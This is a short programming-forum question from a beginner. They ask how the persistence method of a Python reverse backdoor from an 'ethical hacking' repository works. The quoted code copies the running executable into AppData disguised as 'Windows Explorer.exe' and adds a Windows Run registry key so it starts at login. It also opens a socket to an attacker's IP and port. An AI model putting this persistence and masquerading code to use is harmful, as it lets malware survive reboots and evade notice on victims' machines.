# Python Backdoor copy function

Tags: python

I am new to this. I don't understand the become_persistent method in this code https://github.com/GambuzX/EthicalHacking-Python/blob/master/reverse_backdoor.py

```
def __init__(self, ip, port):
        self.become_persistent()
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

def become_persistent(self):
    evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
    if not os.path.exists(evil_file_location):
        shutil.copyfile(sys.executable, evil_file_location)
        subprocess.call('reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Update /t REG_SZ /d "' + evil_file_location + '"', shell=True)
```

My doubt is about the execution order of `become_persistent(self)` and how works `shutil.copyfile(sys.executable, evil_file_location)`, Why is the executable copied before it is created and before the connect function is created?

Regards!